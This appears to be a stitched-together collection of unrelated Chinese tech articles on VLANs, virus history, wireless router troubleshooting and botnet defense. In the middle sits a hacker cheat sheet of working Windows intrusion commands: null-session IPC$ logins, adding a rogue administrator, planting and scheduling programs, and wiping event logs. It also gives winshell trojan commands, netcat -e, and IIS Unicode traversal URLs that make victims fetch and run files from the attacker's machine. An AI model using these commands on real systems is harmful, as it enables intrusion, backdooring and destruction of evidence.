　　就目前来说，对于VLAN的划分主要采取上述第1、3种方式，第2种方式为辅助性的方案。
　　
　　使用VLAN优点
　　使用VLAN具有以下优点：
　　
　　1、控制广播风暴
　　
　　一个VLAN就是一个逻辑广播域，通过对VLAN的创建，隔离了广播，缩小了广播范围，可以控制广播风暴的产生。
　　
　　2、提高网络整体安全性
　　
　　通过路由访问列表和MAC地址分配等VLAN划分原则，可以控制用户访问权限和逻辑网段大小，将不同用户群划分在不同VLAN，从而提高交换式网络的整体性能和安全性。
　　
　　3、网络管理简单、直观
　　
　　对于交换式以太网，如果对某些用户重新进行网段分配，需要网络管理员对网络系统的物理结构重新进行调整，甚至需要追加网络设备，增大网络管理的工作量。而对于采用VLAN技术的网络来说，一个VLAN可以根据部门职能、对象组或者应用将不同地理位置的网络用户划分为一个逻辑网段。在不改动网络物理连接的情况下可以任意地将工作站在工作组或子网之间移动。利用虚拟网络技术，大大减轻了网络管理和维护工作的负担，降低了网络维护费用。在一个交换网络中，VLAN提供了网段和机构的弹性组合机制。
　　
　　三层交换技术
　　传统的路由器在网络中有路由转发、防火墙、隔离广播等作用，而在一个划分了VLAN以后的网络中，逻辑上划分的不同网段之间通信仍然要通过路由器转发。由于在局域网上，不同VLAN之间的通信数据量是很大的，这样，如果路由器要对每一个数据包都路由一次，随着网络上数据量的不断增大，路由器将不堪重负，路由器将成为整个网络运行的瓶颈。
　　
　　在这种情况下，出现了第三层交换技术，它是将路由技术与交换技术合二为一的技术。三层交换机在对第一个数据流进行路由后，会产生一个MAC地址与IP地址的映射表，当同样的数据流再次通过时，将根据此表直接从二层通过而不是再次路由，从而消除了路由器进行路由选择而造成网络的延迟，提高了数据包转发的效率，消除了路由器可能产生的网络瓶颈问题。可见，三层交换机集路由与交换于一身，在交换机内部实现了路由，提高了网络的整体性能。
　　
　　在以三层交换机为核心的千兆网络中，为保证不同职能部门管理的方便性和安全性以及整个网络运行的稳定性，可采用VLAN技术进行虚拟网络划分。VLAN子网隔离了广播风暴，对一些重要部门实施了安全保护；且当某一部门物理位置发生变化时，只需对交换机进行设置，就可以实现网络的重组，非常方便、快捷，同时节约了成本。

病毒、木马一直是互联中最大的隐患，也是网民最感到头痛的话题。其实计算机病毒的产生是网络发展的必然产物，其产生的过程可分为：程序设计-传播-潜伏-触发-运行-攻击-被杀-研发-新变种-再杀-再变，接着再次进入循环轨迹，虽然其危害一方，但安全技术的提升却正是建立在其危险的背后。

病毒是如何产生的
病毒非天生，也是人为的，早期的病毒产生主要是一些技术人群为了不同的目的，或是炫耀或是利益而编写出了不同程序实现需求，而能编写病毒的人员必然是技术核心，其不但对业务十分精通，而对于计算机的内核运作更是了若指掌。下列为其人群进行了分类：

一、程序爱好者：这类人员凭借着对计算机程序的热受与执着，为了表现恶作剧欲望，经过不断的研究编写出指定效果的计算机程序，如：动画、影音文件等让他人浏览观看，以达目的。虽然此程序病毒有一定的危害性，但此类病毒破坏性一般不大。

二、报复心理：此类人群主要是因为在网络或现实生活中，受到措折，或是对某些杀毒软件看不过去，认为其不如传说中的效果，而其对网络病毒又热爱无比，于是头脑中产生一种亲手编写病毒程序来对拼杀软与报复网络，以扬其名。（案例：台湾的学生陈盈豪，以前购买了一些杀病毒软件，用时才知并不如厂家所说的那么厉害，杀不了什么病毒，于是他就编写了一个能避过各种杀病毒软件的病毒CIH，此种病毒引发了网络中的一场灾难）。

三、附带主体：而一些商业软件的技术人员，为了其产品不被非法破解、盗用，于是在所设计的软件中使用加密技术，编写了一些特殊程序附在正版软件上，如遇到非法破解使用，则此类程序将自动激活，激活后所产生的程序将对计算机构成危胁形成破坏，如巴基斯坦病毒就是有力证明。 而有的游戏编写人员则会编写相对抗的程序，进行编程人员之间的相互程序销毁，导至对抗病毒产生，如：磁芯大战。其实有些善意研究病毒程序人员在自身合出病毒程序后，由于某种原因失去控制而进行网络扩散，也会直接导致病毒流行，

四、利益制作：商业、政治、军事为了达到某些目的，于是雇佣程序编写者，编写出指定目的病毒程序，进行电脑攻击，让受击目标形成经济损失或达到窃取机密文件的目的。往小了说：游戏装备、开发中的产品信息，往大了说：军事机密、文件档案等，都将受到严重危害。

病毒跳跃
病毒慢慢形成，为杀毒厂商带来了技术上的更新需求，而对玩家来说却是不小的灾难，病毒从早期的易发现性，慢慢演变成伪造系统目标文件，并注入线程，达到随机产生不同的新型文件，自身代码结构产生不同变化，使其更具备隐匿性，让杀毒软件更难下手查杀。此时，一个新的病毒概念：变形病毒产生了。其实要识别出变形病毒，并非难事，下面将讲述四类变形。

第一类变形病毒程序具备了普通病毒所具有的基本特性，当病毒每进行一次传播时，自身代码会产生演变，导至字节散乱形成新的特征病毒代码，但这些代码其相对空间排列位置不变。当病毒感染系统后遇到杀毒软件或相关检测时，能够进行自身加密或脱密或自行销毁，并且病毒能破坏一定的扫描跟踪；而对于二类变形来说：此种变形不但具备一类变形病毒的特性外，而且会变化代码之间的排列距离(相对空间位置)，病毒程序能用特殊方式或混载于正常的系统命令中，去修改系统关键内核与之溶为一体，或干脆另创建一些新的中断调用功能，形成被感染的文件字节数不定或多或少，造成查杀难度增大；随之加大的三类变形更是高深：此类病毒变形在原有的一、二类变形基础上，再形分裂并在计算机中隐匿多处，当病毒引擎被激发破坏后，能实现自身恢复完整性，而病毒藏身的空间位置是随机变化的，如：藏在主引导区、分区、系统文件、系统目录等依病毒自身变种而定，并在下一次传播目标中再次更换潜藏位置，每一台计算机都不尽相同。目前危害最重的要数到其第四类变形：此种病毒类别不难包含了前面三种变形的所有特征行为外，而且病毒本身可以随时间动态进行变化，本身具有传播性质的“病毒生产机”病毒，可通过网络制造病毒，并将自身代码重新组合，生成不同的变种新病毒随机传播。如：在被感染的计算机内存中执行变化功能。

束语：计算机病毒一直以来在危胁电脑安全，其不但可以大面积传播，而且对硬盘中的数据文件、密码、邮件、帐号等形成不可言语的破坏力，其利害的病毒不光可以感染用户，使计算机速度变慢形成崩溃，更甚至直接可以革式化硬盘，导致被破坏丢失的数据往往需要专业技术人员于以恢复，其造成的损失绝不可轻视，后果不言而语。

随着无线产品走进寻常百姓家庭，无线网络因其组网简单、使用方便已日渐成为组网的主要方式，因此对于无线网络故障的处理方法、技巧被越来越多的人所重视。本文将介绍一类关于无线网络的常见但又容易被人忽视的故障处理，希望能对您处理类似故障时能有所启示。

一、无线路由不能上网的原因

在一次正常上网时，ADSL moderm和无线路由器突然被断电，再次启动后笔记本就无法发现无线网络，无法上网，这是什么地方出现问题了呢？由于是在上网时网络设备意外断电导致故障出现，因此判断结果是：故障可能出在ADSL moderm或无线路由器上。

为判断故障具体出在哪个设备上，首先将ADSL moderm直接连到笔记本上，拨号后笔记本能与网络连接，而且能稳定运行，因此问题应该出在无线路由器上了。

我使用的是TP-LINK的一款WR541G无线路由器，平时使用还算稳定，而且曾经也遇到过路由器突然被断电的情况，当时并没有什么异常，会不会这次断电对路由器硬件造成损坏？

拿起路由器仔细观察，没有发现局部温度过高，也没有闻到异味，外表上看不出有什么异常。将ADSL moderm和无线路由器连接好重新启动，笔记本上的无线网卡提示发现网络并正常连接。检查网络，发现可以正常上网，网络故障好像突然自动消失了。可是持续时间不长，无线网卡突然提示无法发现网络，怎会这样呢？

正当我还在想问题可能出在哪时，网卡又提示发现了网络，可还没持续一分钟，又提示网络无法发现，如此反复。难道会是本本上的网卡出现了问题？重启电脑，故障依旧。

问题似乎一下子变得很复杂起来了，从开始怀疑的ADSL moderm到路由器再到笔记本网卡，笔者始终未找出确切得造成故障现象的问题所在。那问题到底出在哪呢？究竟该如何下手？

二、无线路由故障分析

静静的回顾下故障现象的整个过程，并结合开始做得测试，笔者可以得出以下明确的信息：

1、ADSL moderm直接接在笔记本能正常上网，说明ADSL moderm和笔记本上的集成网卡应该是正常。

2、 使用无线网卡通过路由器上网不正常，说明我们问题可能出在无线网卡或路由器上。

根据以上的信息，可以设计以下的处理方案：

将笔记本上集成的网卡连接无线路由器、ADSL moderm，看上网是否正常。如果正常，说明故障出在笔记本的无线网卡上；否则问题就应该出在无线路由器上了。

将相关设备连接妥当后启动，网络显示正常，然而持续时间不长，网络提示无法连接，故障重现。现在我们可以断定问题应该出在无线路由器上了。那么无线路由器到底怎么了？

仔细地观察路由器，我惊奇地发现当ADSL的DSL指示灯提示网络连接后约半分钟，路由器的LAN端口指示灯突然一齐闪动，然后系统指示灯闪动，显示路由自动重启。这是怎么回事？难道路由器坏了不成？

根据前面做的测试结果，我们发现无论是集成网卡还是无线网卡都会出现相同的故障现象，而两块网卡连接网络都需要经过的链路只有路由器的WLAN口和ADSL moderm，但是ADSL moderm正常，问题进一步缩小到路由器上的WLAN口。

为了证实以上的推断，笔者将ADSL moderm与路由器断开，再将电脑与路由器连接，发现无论集成网卡还是无线网卡都不会出现开始前的故障现象，因此可以确定路由器上的WLAN口有问题。

看来问题所在已经找到了，但接下来可就头痛了。我们如何处理呢？这款路由器只有一个WLAN口，如果这个唯一WLAN口坏了，那这块路由器也只有报销了。看来是将自己逼上了“绝路”。

三、升级软件问题解决

取下路由器仔细地查看WLAN口，没有闻到异味，局部温度也正常，试着将网线插进去，卡口处接触良好，没有发现异常的物理损坏或物理连接异常。此时脑海里闪现出一种想法：会不会是控制WLAN口的软件出现问题呢？将无线路由器初始化后重新配置，故障现象消失。

问题解决起来似乎很简单，但分析、判断问题却很费一番功夫。总结处理故障的过程可以发现，这是比较典型的路由器控制软件Bug导致的网络故障。此类问题的特点就是故障现象的产生是由于某些意外因素引起且表现不一，具有很强的迷惑性。

在本例中，笔者以前也遇到过路由器突然被断电的情况，但并没有出现任何故障，因此此类因素造成的网络故障很容易被人所忽视。

无论何种品牌的无线路由器都或多或少的存在前期设计过程留存的技术缺陷，也就是常说的控制软件Bug，这使得此类因素导致的故障非常常见。此类的问题要从根本解决就必须升级升级本路由器的软件，有时还可能是多次升级。

像这款TP-LINK的WR541G无线路由器，事后我升级了软件版本，但仍不能避免类似故障出现，直到2006年升级到1.2.0 Build 060119 Rel.40252n版本后才彻底解决。

因此当你遇到无线网络故障且又不能以常规的思路方式分析处理时，试试往这方面分析，看看能否对处理解决问题有所帮助。

网管和黑客都必须知道的命令!看了不要做坏事!
常用的几条NET命令：
==================================================
（与远程主机建立空管连接） net use [url=file://\\IP]\\IP[/url]地址\ipc$ "" /use:""
（以管理员身份登录远程主机） net use [url=file://\\IP]\\IP[/url]地址\ipc$ "密码" /use:"Administrator"
（传送文件到远程主机WINNT目录下）copy 本机目录路径\程序 [url=file://\\IP]\\IP[/url]地址\admin$
（查看远程主机时间） net time [url=file://\\IP]\\IP[/url]地址
（定时启动某个程序） at [url=file://\\IP]\\IP[/url]地址 02:18 readme.exe
（查看共享） net view [url=file://\\IP]\\IP[/url]地址
（查看netbios工作组列表） nbtstat -A IP地址
（将远程主机C盘映射为自己的F盘） net use f: [url=file://\\IP]\\IP[/url]地址\c$ ""/user:"Administrator"
（这两条把自己增加到管理员组）： net user 用户名 密码 /add
net localgroup Administrators 用户名 /add
（断开连接） net use [url=file://\\IP]\\IP[/url]地址\ipc$ /delete
=====================================================
擦屁屁：
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
============================
一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务：
netsvc /list [url=file://\\IP]\\IP[/url]地址
netsvc schedule [url=file://\\IP]\\IP[/url]地址 /query
netsvc [url=file://\\IP]\\IP[/url]地址 schedule /start
二、OpenTelnet.exe
远程启动主机的Telnet服务，并绑定端口到7878，例如：
OpenTelnet [url=file://\\IP]\\IP[/url]地址 用户名 密码 1 7878
然后就可以telnet到主机的7878端口，进入DOS方式下：
telnet IP地址 7878
三、winshell.exe
一个非常小的木马（不到6K），telnet到主机的7878端口，输入密码winshell，当看到CMD>后，可打下面的命令：
p Path （查看winshell主程序的路径信息）
b reBoot （重新启动机器）
d shutDown （关闭机器）
s Shell （执行后你就会看到可爱的“C:\>”）
x eXit （退出本次登录会话，此命令并不终止winshell的运行）
CMD> http://.../srv.exe （通过http下载其他网站上的文件到运行winshell的机器上）
四、3389登陆器，GUI方式登录远程主机的
五、elsave.exe
事件日志清除工具
elsave -s [url=file://\\IP]\\IP[/url]地址 -l "application" -C
elsave -s [url=file://\\IP]\\IP[/url]地址 -l "system" -C
elsave -s [url=file://\\IP]\\IP[/url]地址 -l "security" -C
执行后成功清除应用程序日志，系统日志，安全日志
六、hbulot.exe
开启win2kserver和winxp的3389服务
hbulot [/r]
使用/r表示安装完成后自动重起目标使设置生效。
七、nc.exe(netcat.exe)
一个很好的工具，一些脚本程序都要用到它，也可做溢出后的连接用。
想要连接到某处: nc [-options] hostname port[s] [ports] ...
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
八、TFTPD32.EXE
把自己的电脑临时变为一台FTP服务器，让肉鸡来下载文件，tftp命令要在肉鸡上执行，通常要利用Unicode漏洞或telnet到肉鸡，例如：
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
然后可以直接令文件运行：
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的，选择“溢出后在一个端口监听”，然后用telnet连接它的监听端口，如果溢出成功，一连它的端口，绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出，成功以后winxp下需要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor，exe要放到cgi-bin目录下，asp放到有ASP执行权限的目录。然后用IE浏览器连接。
一、一 Xscan命令行运行参数说明：
在检测过程中，按"[空格]"键可以查看各线程状态及扫描进度，按"q"键保存当前数据后提前退出程序，按""强行关闭程序。
1.命令格式: xscan -host [-] [其他选项]
xscan -file [其他选项]
其中 含义如下:
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表)；
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件)；
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件)；
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案)；
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案)；
[其他选项] 含义如下:
-v: 显示详细扫描进度
-p: 跳过Ping不通的主机
-o: 跳过没有检测到开放端口的主机
-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10

在互联网安全日夜严重的今天，网民到底该何去何从。面对盗号木马、病毒、DDOS、僵尸网络的挑战，难到就没有很好的方法进行有力的抵抗，网络到底能发展成何种趋势？很多单机、网吧、局域网、站点用户只能报着侥幸的心理不被攻击，而事实却是依靠实力生存，下面针对僵尸网络进行抗战。

了解僵尸网络
当互联网中多台计算机被恶意代码感染后，形成庞大网络傀儡，并由远程非法用户所控制，此时形成的网络就是恶意昭著的僵尸网络（Botnet）。恶意用户在被控制的机器中安装攻击软件，对网络中某一目标（站点、网页、IP）发起集中攻击如：DDOS分布式洪水攻击等，杀伤力将十分惊人。此种方式目前正伦为黑客攻击的首席方程式！站点由于目标大并且在互联网中有固定的IP地址，往往会让黑客钉牢更容易成攻击的首选目标，面对此种情况，很多技术人员总结出了下面几条经验：

Web过滤服务启用
Web过滤服务对所有的Web活动进行监控，对Web站点发出的不正常行为，已知的恶意活动，进行阻止，并禁止站点与用户接触，可是算是一种有力阻击僵尸网络的方式。通常一个好的Web过滤服务可以过以过滤任何客户端对Web服务器的HTTP请求，并使用预先定义的规则允许和禁止其连接，能够对HTTP协议头的各部分长度进行设置，防止缓冲区溢出攻击，并对对所请求的URL中所包含的关键字进行过滤，Web后缀名、内容过滤等。

入侵检测禁用脚本
入侵检测技术IDS是一种主动保护自己免受攻击的一种网络安全技术。对于僵尸网络，技术人员提供了入侵检测的思路。由于许多情况下IDS（入侵检测系统），可以记录和禁止网络活动，监视网络流量，提供实时报警。在不影响网络性能的情况下能对网络进行监测，有效防止或减轻上述的网络威胁。而IPS（入侵防御系统）则在TCP/IP协议的过滤方面非常出色，对防火墙所不能过滤的攻击进行过滤。在大多数情况下，可以提供网络地址转换、服务代理、流量统计等功能。由于IPS检测到攻击后会采取行动阻止攻击行为，可以说IPS是基于IDS的、是建立在IDS基础上。当用户安装有IDS（入侵检测系统）和IPS（入侵防御系统）时，那对于查找有僵尸特征十分便利，网络中一台计算机的SSL通信突然之间上升时，端口活动频繁时，很有可能将激活僵尸网络特定通道，构成威胁。
而在脚本禁用上，只要依次右击桌面Internet Explorer属性-高级-禁用脚本调试（Internet Explorer）与禁用脚本调试（其它）即可。此时浏览器在打开恶意WEB页面时将启用不了脚本调试，虽然有时会降低工作效率，但安全还应在首位。

防范要领
面对强此庞大的僵尸网络，就需要互联网中的每位用户集合起来，增强安全意识并了解基本的安全知识，及时更新软件补丁，并安装个人防火墙等安全软件，尽量避免使自己的计算机成为僵尸网络的一部分。 而企业则需加大力度保证服务器的安全性能，增加策略防火墙以达不被黑客所利用。

后记：对僵尸网络的打击，还需要专业安全公司、运营商等多部门和企业来进行配合工作。同时通过在运营商以及最终客户端进行防护与缓解，才有可能从源头上对僵尸网络进行遏制。网络的天空还需要网民共同携手。